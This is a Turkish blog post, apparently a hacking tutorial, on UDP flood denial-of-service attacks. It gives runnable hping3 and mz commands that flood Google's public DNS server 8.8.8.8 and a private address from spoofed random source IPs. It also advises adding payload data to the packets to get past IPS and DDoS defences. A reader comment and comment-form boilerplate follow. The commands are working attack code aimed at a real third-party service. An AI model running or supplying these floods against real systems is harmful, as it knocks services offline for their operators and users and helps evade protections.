Loading...

UDP Flood Saldırısı

Amacımız hedefe yoğun bir şekilde UDP paketleri göndererek hedef sistemi devredışı bırakmak.

Kullanılan araçlarımız

  • Hping
  • Mz

1.Adım:Hping kullanarak google dns server'a (8.8.8.8) rastgele ip adreslerinden UDP flood saldırısı yapalım

root@bt:~# hping3 --udp 8.8.8.8 -p 53 --flood --rand-source

2.Adım:Mz kullanarak aynı server'a rastgele ip adreslerinden UDP flood saldırısı yapalım.

root@bt:~# mz eth0 -c 0 -A rand -B 8.8.8.8 -t udp dp=53

3.Adım:Çoğu IPS ve DDos savunma sistemi UDP paketlerini anormal paketler olarak görür ve engeller.

Bu korumayı atlatmak için UDP paketlerine ekleme yapılabilir, bu paketlere veri eklemek için ise hping3 ve mz yazılımları kullanılabilir.

Bunları kullanarak içi dolu UDP paketleri ile UDP flood saldırıları yapalım.

root@bt:~# echo "Flood eğitimi" >> deneme.txt

root@bt:~# hping3 --udp -p 500 192.168.2.103 -E deneme.txt -d 50 --flood --rand-source

4.Adım:Mz kullanarak bu saldırıyı gerçekleştirelim.
root@bt:~# mz eth0 -c 0 -A rand -B  8.8.8.8 -t udp dp=53 -P "Flood eğitimi"





udp 361033622001504175

Yorum Gönder

  1. Kaan
    Hocam anlatım için teşekkürler fakat kullandığın parametreleri kısaca açıklarsan çok güzel olur

    YanıtlaSil
  2. Bu yorum yazar tarafından silindi.

    YanıtlaSil

Yorumunuza video ekleyebilirsiniz:
[video]youtube yada vimeo video linki[/video]

Yorumunuza resim ekleyebilirsiniz:
[img]resim linki[/img]

emo-but-icon

Ana Sayfa item

Popüler Yazılar